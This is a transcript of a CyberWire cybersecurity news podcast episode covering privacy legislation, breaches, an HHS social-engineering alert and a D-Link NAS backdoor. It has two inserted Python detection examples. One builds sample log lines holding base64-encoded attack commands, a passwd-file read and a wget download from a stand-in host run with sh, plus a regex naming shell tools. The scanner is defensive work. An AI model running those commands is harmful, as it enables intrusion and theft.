The CyberWire Daily Podcast 4.8.24
Ep 2041 | 4.8.24

A possible breakthrough in data privacy legislation.

Transcript

Might there be motion from Congress on data privacy legislation? Maryland passes a pair of privacy bills. A database allegedly from the EPA shows up on Russian cybercrime forums. HHS issues an alert for the Healthcare and Public Health sectors. CISA gears up for their Cyber Storm. A leading UK veterinary service provider suffers a cyber incident. A hardcoded backdoor is discovered in deprecated Network Attached Storage devices. NSA’s new cybersecurity director takes the reins. Guest Caleb Barlow, CEO of Cyberbit, shares his insights on the evolving role of the CISO. The bull market for Zero-days.

Today is April 8th, 2024. I’m Dave Bittner. And this is your CyberWire Intel Briefing.

Might there be motion from Congress on data privacy legislation?

I wouldn’t get your hopes up, but Congress appears to be nearing a breakthrough on data privacy legislation with the unveiling of the American Privacy Rights Act (APRA). This bipartisan effort proposes significant restrictions on how companies can collect, retain, and utilize consumer data—limiting it to what's necessary for their services. It empowers users to opt out of targeted advertising and manage their online data, including corrections, deletions, and downloads. A key feature is the establishment of a national data broker registry, mandating an opt-out option for data sales.

The proposal addresses Americans' desire for more control over their personal information, targeting Big Tech's data practices and ensuring user consent. The APRA attempts to navigate longstanding legislative divisions, particularly around preemption of state laws and individual legal recourse against privacy breaches. It incorporates stronger protections than existing laws, allowing for state-specific regulations on civil rights and consumer protections, while including provisions from California's privacy law for lawsuits related to data breaches.

Enforcement focuses on larger businesses, exempting small companies and certain entities like government organizations. Despite its comprehensive approach, the APRA's success remains uncertain, as it enters a discussion phase for further refinement and support. 

Maryland passes a pair of privacy bills. 

Meanwhile, on the state level, the Maryland legislature has passed two major privacy bills aimed at regulating tech companies' data collection practices, especially concerning consumers and minors, despite significant opposition from industry giants like Amazon, Google, and Meta. The Maryland Online Data Privacy Act introduces broad restrictions on consumer data collection and usage within the state. The Maryland Kids Code specifically targets the protection of users under 18, banning tracking and manipulative tactics designed to keep them online. Lawmakers say these moves signal Maryland's commitment to establishing robust data privacy protections, aligning it with states like California and Connecticut. However, tech industry challenges are anticipated, particularly from groups like NetChoice, which has previously contested similar legislation on constitutional grounds. The success of these bills hinges on Governor Wes Moore's approval, positioning Maryland as a potential leader in the national privacy legislation landscape, pending inevitable legal challenges.

A database allegedly from the EPA shows up on Russian cybercrime forums. 

The U.S. Environmental Protection Agency (EPA) is contending with a significant data breach impacting over 8.5 million users, attributed to a hacker known as USDoD. The breach has exposed sensitive personal information, posing risks of identity theft, cyber espionage, and could deter environmental violation reporting. The leaked database includes contact information for customers, contractors, and staff, with details such as full names, phone numbers, email addresses, and job titles, but thankfully no passwords were compromised. The data, now circulating in Russian cybercrime forums, underscores the breach's potential for misuse in phishing scams, targeted marketing, and state-sponsored espionage. This incident highlights vulnerabilities in protecting critical environmental and infrastructure data and raises alarms about the chilling effect it could have on future environmental reporting efforts.

HHS issues an alert for the Healthcare and Public Health sectors. 

The U.S. Department of Health and Human Services (HHS) has issued an alert regarding sophisticated social engineering attacks targeting IT help desks within the Healthcare and Public Health sector. Attackers are using detailed personal information, likely harvested from professional networking sites and open-source intelligence (OSINT), to impersonate employees, particularly in financial roles. By tricking help desk personnel into enrolling new devices for multi-factor authentication (MFA), these threat actors gain access to corporate resources. Their main objective is to obtain login credentials for payer websites to redirect legitimate payments to their controlled U.S. bank accounts, eventually transferring these funds overseas. Additionally, some attacks have involved AI voice cloning techniques to enhance their deception. To combat these threats, HHS recommends several mitigation strategies, including requiring callbacks for verification, monitoring suspicious account changes, and training help desk staff to recognize and respond to social engineering and spear-phishing attempts.
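The "monitoring suspicious account changes" mitigation above can be turned into a concrete detection. The following is an added example, not from HHS or the podcast, with constructed identity-provider and ticketing events; the user names, IP addresses, event names and the payment-role list are all assumptions, since real IdPs use their own schemas. It flags an MFA factor enrolment that follows a help-desk MFA reset within a short window and arrives from an address the user has never logged in from, which is the sequence the alert describes.

```python
"""Detection logic for the help-desk MFA re-enrolment pattern described in the HHS alert.
Added example with constructed events; not from HHS or the podcast."""
from collections import defaultdict
from datetime import datetime, timedelta

# Constructed identity-provider and ticketing events (hypothetical users, IPs and
# event names). Fields: timestamp, event type, affected user, source IP of the
# request, and the actor who triggered it.
EVENTS = [
    {"ts": "2024-04-05T08:02:00", "type": "login.success", "user": "j.doe", "ip": "10.1.4.22", "actor": "j.doe"},
    {"ts": "2024-04-05T08:10:00", "type": "login.success", "user": "r.patel", "ip": "10.1.4.40", "actor": "r.patel"},
    # Help desk resets MFA for j.doe after a phone call; minutes later a new
    # factor is enrolled from an address never seen on any of j.doe's logins.
    {"ts": "2024-04-05T09:15:00", "type": "helpdesk.mfa_reset", "user": "j.doe", "ip": "10.1.9.7", "actor": "helpdesk.agent3"},
    {"ts": "2024-04-05T09:21:00", "type": "mfa.factor.enrolled", "user": "j.doe", "ip": "203.0.113.45", "actor": "j.doe"},
    {"ts": "2024-04-05T09:30:00", "type": "password.changed", "user": "j.doe", "ip": "203.0.113.45", "actor": "j.doe"},
    # Benign: help-desk reset followed by enrolment from the user's usual office address.
    {"ts": "2024-04-05T10:05:00", "type": "helpdesk.mfa_reset", "user": "r.patel", "ip": "10.1.9.7", "actor": "helpdesk.agent1"},
    {"ts": "2024-04-05T10:12:00", "type": "mfa.factor.enrolled", "user": "r.patel", "ip": "10.1.4.40", "actor": "r.patel"},
    # Benign: self-service enrolment with no help-desk involvement.
    {"ts": "2024-04-05T11:00:00", "type": "mfa.factor.enrolled", "user": "a.smith", "ip": "10.1.4.30", "actor": "a.smith"},
]

# Assumed: accounts with access to payer portals or payment workflows, which the
# alert describes as the attackers' real target.
PAYMENT_ROLE_USERS = {"j.doe", "r.patel"}


def detect_suspicious_enrolments(events, window=timedelta(hours=2)):
    """Return alerts for MFA factor enrolments that (a) follow a help-desk MFA reset
    within `window` and (b) originate from an IP the user has never logged in from."""
    ordered = sorted(events, key=lambda e: e["ts"])
    known_ips = defaultdict(set)     # user -> IPs seen on successful logins so far
    reset_times = defaultdict(list)  # user -> timestamps of help-desk MFA resets
    alerts = []
    for e in ordered:
        ts = datetime.fromisoformat(e["ts"])
        user = e["user"]
        if e["type"] == "login.success":
            known_ips[user].add(e["ip"])
        elif e["type"] == "helpdesk.mfa_reset":
            reset_times[user].append(ts)
        elif e["type"] == "mfa.factor.enrolled":
            recent_reset = any(timedelta(0) <= ts - r <= window for r in reset_times[user])
            unseen_ip = e["ip"] not in known_ips[user]
            if recent_reset and unseen_ip:
                reasons = [f"factor enrolled within {window} of a help-desk MFA reset",
                           f"enrolment from {e['ip']}, never seen on a login for {user}"]
                severity = "medium"
                if user in PAYMENT_ROLE_USERS:
                    reasons.append("account holds a payment-handling role")
                    severity = "high"
                alerts.append({"user": user, "ts": e["ts"], "ip": e["ip"],
                               "severity": severity, "reasons": reasons})
    return alerts


if __name__ == "__main__":
    for a in detect_suspicious_enrolments(EVENTS):
        print(a["severity"].upper(), a["user"], a["ts"], a["ip"], "; ".join(a["reasons"]))
```

The callback to a phone number already on record is the procedural control; this is the monitoring control that catches the case where the callback was skipped or the caller had already taken over the phone line. In production the "never seen" test needs a longer login baseline than the few constructed events here, and the password change that follows the enrolment is a second signal worth correlating.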

CISA gears up for their Cyber Storm. 

The Cybersecurity and Infrastructure Security Agency (CISA) is gearing up for its biannual "Cyber Storm" exercise, an event designed to simulate responses to a large-scale cyberattack on U.S. critical infrastructure. This month's exercise, which is the ninth of its kind since 2006, will involve over 2,000 participants from both government and various critical sectors like healthcare, finance, and energy. The event aims to test the effectiveness of the National Cyber Incident Response Plan, which CISA is currently updating. The exercise unfolds over a week, presenting participants with hypothetical scenarios to test their preparedness and response strategies without revealing specific details ahead of time to maintain operational security. This year's Cyber Storm is particularly timely, given recent warnings about hackers targeting U.S. infrastructure, and aims to enhance readiness for inevitable real-world incidents through a collaborative approach.

A leading UK veterinary service provider suffers a cyber incident. 

Leading UK veterinary service provider CVS Group has experienced significant operational disruptions due to a cyber-incident, involving unauthorized access to its IT systems. The company, which operates vet practices, laboratories, and crematoria across the UK, Australia, the Netherlands, and Ireland, took immediate action to isolate the issue and temporarily shut down its IT systems to prevent further breaches. Although the specific nature of the cyber-attack remains under investigation, it has characteristics of ransomware. CVS has engaged specialist consultants for a forensic analysis and informed relevant authorities, including the Information Commissioner’s Office. While it has managed to restore IT services to most of its practices, increased security measures mean some systems are not fully efficient, causing ongoing operational impacts. The incident has spurred CVS to accelerate plans for migrating its IT infrastructure to the cloud. For our US listeners we note that CVS Group in the UK is unrelated to the US healthcare and pharmacy company CVS. 

A hardcoded backdoor is discovered in deprecated Network Attached Storage devices. 

A significant security flaw affects several end-of-life D-Link Network Attached Storage (NAS) models, allowing for arbitrary command execution due to a hardcoded backdoor account and a command injection vulnerability. Discovered by threat researcher 'Netsecfish,' the vulnerability allows attackers to remotely execute commands on affected devices by sending a base64-encoded command through an HTTP GET request. Over 92,000 vulnerable devices have been found online. D-Link has acknowledged that these models are no longer supported, advising users to replace them, stating that they won’t offer patches due to the devices' end-of-life status.
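Because the devices will not be patched, the practical question for anyone who still has one behind a firewall is whether the delivery pattern described above, a base64-encoded command in an HTTP GET, shows up in their web-server or proxy logs. The following is an added example, not the researcher's proof of concept and not D-Link code: the CGI path, parameter names, IP addresses and log lines are all constructed for illustration. It parses combined-format access log lines, strictly base64-decodes every query value, and flags decoded values that contain shell metacharacters or download-and-execute tooling, while letting a benign base64 token through.

```python
"""Spot GET requests whose query parameters carry base64-encoded shell commands,
the delivery method described for the deprecated-NAS command injection.
Added example with constructed log lines and a hypothetical CGI path; not the
researcher's proof of concept or D-Link code."""
import base64
import binascii
import re
from urllib.parse import parse_qsl, quote, urlsplit

REQUEST_RE = re.compile(r'"(?P<method>[A-Z]+) (?P<target>\S+) HTTP/')
# Shell syntax and download/execute tooling that a legitimate parameter would
# not normally decode to.
SHELL_INDICATORS = re.compile(
    r"(;|\|\||&&|\||`|\$\(|/bin/|\b(?:wget|curl|busybox|telnetd|nc|sh)\b)")


def _param(text: str) -> str:
    """base64-encode and URL-escape a value the way it would appear in a request."""
    return quote(base64.b64encode(text.encode()).decode(), safe="")


# Constructed combined-format access log lines (hypothetical IPs and paths).
# Lines 2 and 3 mimic the attack pattern; line 4 carries a benign base64 token.
SAMPLE_LOG = "\n".join([
    '198.51.100.7 - - [08/Apr/2024:10:00:01 +0000] "GET /index.html HTTP/1.1" 200 512',
    '198.51.100.9 - - [08/Apr/2024:10:00:05 +0000] '
    f'"GET /cgi-bin/example.cgi?user=svc&cmd={_param("id;cat /etc/passwd")} HTTP/1.1" 200 88',
    '198.51.100.9 - - [08/Apr/2024:10:00:06 +0000] '
    f'"GET /cgi-bin/example.cgi?user=svc&cmd={_param("wget http://203.0.113.5/a.sh -O /tmp/a;sh /tmp/a")} HTTP/1.1" 200 91',
    '10.0.0.4 - - [08/Apr/2024:10:01:00 +0000] '
    f'"GET /share?token={_param("session-12345")} HTTP/1.1" 200 2048',
])


def decode_b64_strict(value: str):
    """Return the decoded text if `value` is well-formed base64 of printable ASCII,
    otherwise None. Short or non-alphabet values are rejected up front."""
    if len(value) < 8 or not re.fullmatch(r"[A-Za-z0-9+/]+=*", value):
        return None
    padded = value + "=" * (-len(value) % 4)
    try:
        raw = base64.b64decode(padded, validate=True)
        text = raw.decode("ascii")
    except (binascii.Error, ValueError, UnicodeDecodeError):
        return None
    return text if text.isprintable() else None


def find_encoded_commands(log_text: str):
    """Parse each request line, base64-decode every query value, and flag decoded
    values that contain shell metacharacters or download/execute tooling."""
    findings = []
    for line in log_text.splitlines():
        m = REQUEST_RE.search(line)
        if not m:
            continue
        client_ip = line.split(" ", 1)[0]
        parts = urlsplit(m.group("target"))
        for name, value in parse_qsl(parts.query, keep_blank_values=True):
            decoded = decode_b64_strict(value)
            if decoded is None:
                continue
            hit = SHELL_INDICATORS.search(decoded)
            if hit:
                findings.append({"ip": client_ip, "path": parts.path, "param": name,
                                 "command": decoded, "indicator": hit.group(0)})
    return findings


if __name__ == "__main__":
    for f in find_encoded_commands(SAMPLE_LOG):
        print(f"{f['ip']} {f['path']} {f['param']}= -> {f['command']!r} (matched {f['indicator']!r})")
```

The strict decode (alphabet check, padding repair, printable-ASCII requirement) is what keeps ordinary session tokens and binary blobs from producing noise; the indicator list is deliberately short and should be tuned to the device's own command set. A hit from an address outside the management network is, on an unpatchable device, a signal to take it offline rather than to investigate further.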

NSA’s new cybersecurity director takes the reins. 

Dave Luber has officially taken the reins as the new cybersecurity director of the National Security Agency (NSA), succeeding Rob Joyce who retired on March 31 after 35 years of public service. Luber, with over 30 years of experience in various significant roles within the NSA and US Cyber Command, will now lead the agency’s cybersecurity directorate. This directorate aims to combat cyber threats against the Department of Defense, National Security Systems, and the Defense Industrial Base. Luber expressed his commitment to building upon the team's achievements and enhancing collaborations to bolster cybersecurity defenses.

Next up, we’ve got my discussion with Caleb Barlow, CEO of Cyberbit, about how we need to think about the role and position of the CISO.

 

The bull market for Zero-days. 

And finally, the market for “zero-days,” hacking tools that exploit unpatched software vulnerabilities, has seen a significant price increase, with values reaching millions. Crowdfense, a startup company that acquires these tools to resell primarily to government agencies, now offers up to $7 million for iPhone hacks, $5 million for Android, and between $3 million and $3.5 million for browser exploits. This price hike reflects the growing difficulty of hacking devices and apps due to enhanced security measures by companies like Apple and Google. The rising costs also indicate the complexity and team effort required to develop such exploits now, compared to the past, when a single researcher could find and develop a zero-day. Amidst global tensions and sanctions, the industry faces ethical and legal scrutiny, especially when exploits may target individuals in countries with contentious human rights records.

At these prices, our social media influencer desk wonders how long it will be before online trend-setters stop bragging about the high cost of their mobile devices and diamond-studded cases, and shift to the multi-million dollar valuations of their potential security weaknesses. Stranger things have happened…

And that’s the CyberWire.

For links to all of today’s stories, check out our Daily Briefing at the cyberwire dot com.

 

We’d love to know what you think of this podcast. You can email us at cyberwire@n2k.com—your feedback helps us ensure we’re delivering the information and insights that help keep you a step ahead in the rapidly changing world of cybersecurity.

We’re privileged that N2K and podcasts like the CyberWire are part of the daily intelligence routine of many of the most influential leaders and operators in the public and private sector, as well as the critical security teams supporting the Fortune 500 and many of the world’s preeminent intelligence and law enforcement agencies.

N2K strategic workforce intelligence optimizes the value of your biggest investment—people. We make you smarter about your team, while making your team smarter. Learn more at n2k.com.

 

This episode was produced by Liz Stokes. Our mixer is Tré Hester, with original music by Elliott Peltzman. Our executive producers are Jennifer Eiben and Brandon Karpf. Our executive editor is Peter Kilpe, and I’m Dave Bittner. Thanks for listening.